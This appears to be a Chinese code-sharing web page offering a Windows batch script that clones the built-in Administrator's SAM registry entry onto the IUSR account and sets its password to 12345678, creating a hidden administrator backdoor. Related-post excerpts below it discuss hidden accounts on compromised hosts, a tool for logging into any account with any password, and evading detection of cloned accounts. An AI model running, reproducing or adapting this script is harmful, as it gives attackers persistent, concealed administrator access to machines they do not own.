windows 复制隐藏帐号完全批处理

代码如下:

echo off
setlocal enabledelayedexpansion
echo %computername%
echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_%computername%
rem unicode ->ascii
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem find IUSR_%computername% 的对应id
for /F "delims=( tokens=1-5* skip=3" %%a in (%windir%\..\2.reg) do set iusr_id=%%b
del /q "%windir%\..\2.reg"
rem export administrator register
regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem replace 1fx->iusr_id
for /f "tokens=* delims=:" %%i in (%windir%\..\2.reg) do (
for /f "tokens=*" %%j in ("%%i") do (
set TMP=%%j
set "TMP=!TMP:000001F4=00000%iusr_id:~0,3%!"
echo !TMP!>>%windir%\..\1.reg
)
)
regedit /s %windir%\..\1.reg
del /q %windir%\..\1.reg
del /q %windir%\..\2.reg
echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
del /q "%windir%\..\1.reg"
net user IUSR_%computername% 12345678

克隆出来的用户名是固定的,随便变换的话要改代码

(0)

相关推荐

  • windows 复制隐藏帐号完全批处理

    复制代码 代码如下: echo off setlocal enabledelayedexpansion echo %computername% echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >"%windir%\..\1.reg" regini "%windir%\..\1.reg" regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domai

  • 预防黑客侵入你正在使用的Win系统(隐藏帐号)

    在肉鸡上建立一个隐藏的账户,以备需要的时候使用.账户隐藏技术可谓是最隐蔽的后门,一般用户很难发现系统中隐藏账户的存在,因此危害性很大,本文就对隐藏账户这种黑客常用的技术进行揭密. 在隐藏系统账户之前,我们有必要先来了解一下如何才能查看系统中已经存在的账户.在系统中可以进入"命令提示符",控制面板的"计算机管理","注册表"中对存在的账户进行查看,而管理员一般只在"命令提示符"和"计算机管理"中检查是否有异常

  • win2003下创建永远的隐藏帐户的图文教程

    前段时间比较流行的一句话"肉机"其实要想控制远端的计算机,那我想就少不了隐藏用户帐号的问题了,其实创建隐藏用户帐号还是比较简单的,现在我就把创建隐藏用户帐号告诉大家. 其实每一个用户帐号在注册表中都有自己帐号数据项 首先我们看看管理员在注册表中的数据项是什么样的(如下图) 图1 操作一.打开注册表:HKEY_LOCAL_MACHINE\SAM\SAM SAM是保存用户帐号的地方,不过这个"项"在默认情况下是不可见的.我们如果想看内部的内容就必须首先对其授权.(建议对

  • c# 使用特定帐号密码访问Windows网路共享

    透过程式存取Windows网路分享的档案也算常见需求,但存取身分是个问题.之前我惯用的技巧是用有权限的AD网域帐号执行排程存取网路分享,但这招要搬进网站或遇到不同网路分享用不同帐号便会破功.最近遇上类似议题,直觉要得回头靠WinAPI Impersonation解决,之前曾写过通用元件,担心11年前Windows Vista/7时代的作品有点过时,就爬文找找更好的做法. 之前的变身做法是改变Thread的执行身分,然而针对网路分享还有另一个WinAPI - WNetAddConnection2,

  • 利用SQL SERVER建立登录WINDOWS帐号

    那一刻,我的心跳到了嗓子眼. 运行建立帐号命令,OK! 远程登录,输入帐号,密码,OK!终于又进去了! ××××××××××××××××××× 我忽然发现,数据库服务器登录不了了. 提示帐号密码过期.按提示修改,提交,又说我没权限修改密码! CNM,这样来害我.这个帐号属于administrators,原先那个默认的administrator被我停掉了.因此这个帐号是进入系统的唯一通道. 接着发现后果比我想象的要严重更多: 1.硬盘做了RAID5,这样即使拿到硬盘,可能也读不出数据库文件了. 2

  • NtGodMode.exe任意密码登录windows系统帐号下载

    作者:golds7n[LAG] 大小:9216 Bytes MD5 :7026217dc72aa564a2834995d7a7b017 来源:安全焦点 --------– NtGod Private Powered By golds7n[LAG] --------– Usage: NtGodMode.exe ON|OFF NTGod NT上帝模式,打开上帝模式可以用任意密码登录任意windows系统帐号,从而达到不增加帐号.不破坏被入侵主机系统的情况下,登录系统帐号. 情 景再现: 当你在进行主

  • QQ多帐号自动登录批处理脚本

    复制代码 代码如下: '定义QQ程序路径.帐名.密码 Dim Program1,a,b Program1= "C:\Program Files\Tencent\QQ\Bin\QQ.exe" Set WshShell=createobject("wscript.shell") '运行QQ主程序 Set oExec=WshShell.Exec(Program1) WScript.Sleep 1000 '激活QQ窗口 WshShell.AppActivate "

  • SQL2000中的默认sa帐号的修改与删除方法

    现在用MSSQL的地方太多了,有很多做技术的个人电脑上也安装SQL专业版,因为它用的多,但用的人都知道,SQL有个超级用户sa,此用户默认情况下,它指派给固定服务器角色 sysadmin,并不能进行更改.一般懂点安全问题的技术人员都会把这个密码修改掉,但修改再复杂的密码都不是绝对安全的,一些暴力破解软件,菜鸟都会用.那怎么办呢,最好的办法就是删除或改名,下面提供方法. 为了加强安全把默认的sa用户更改掉,安全性会有大幅提升. Alter LOGIN sa DISABLE Alter LOGIN

  • 一个隐蔽克隆帐号的方法

    文章作者:a11yesno 信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 漏洞发现日期 05年某月 注:因为最近没怎么关注网络安全 凭记忆中貌似没人说过这个方法 所以放出来 不要拍砖我 thx! 原理很简单的啊 sam的 FV键值吧 重点如何躲过检测 一般的检测克隆帐号的都是检测 sam里面有没有相同的 FV吧 利用这个特性绕过检测吧 呵呵 步骤 1.net user allyesno freexploit /add&net localgroup administrat

  • 关于网站应用程序池的帐号密码更改及其影响的实例分析

    实例场景 我们有一个网站(名称为test),它使用了一个应用程序池(名称也为test) 这个应用程序池所使用的用户帐号为app_pool_test 这个帐号当前的密码,假设为 abc .当我设置好之后,我可以正常打开网站 这个演示页面的功能很简单,我是使用下面的代码去访问了一下数据库 复制代码 代码如下: using System; using System.Collections.Generic; using System.Linq; using System.Web; using Syste

随机推荐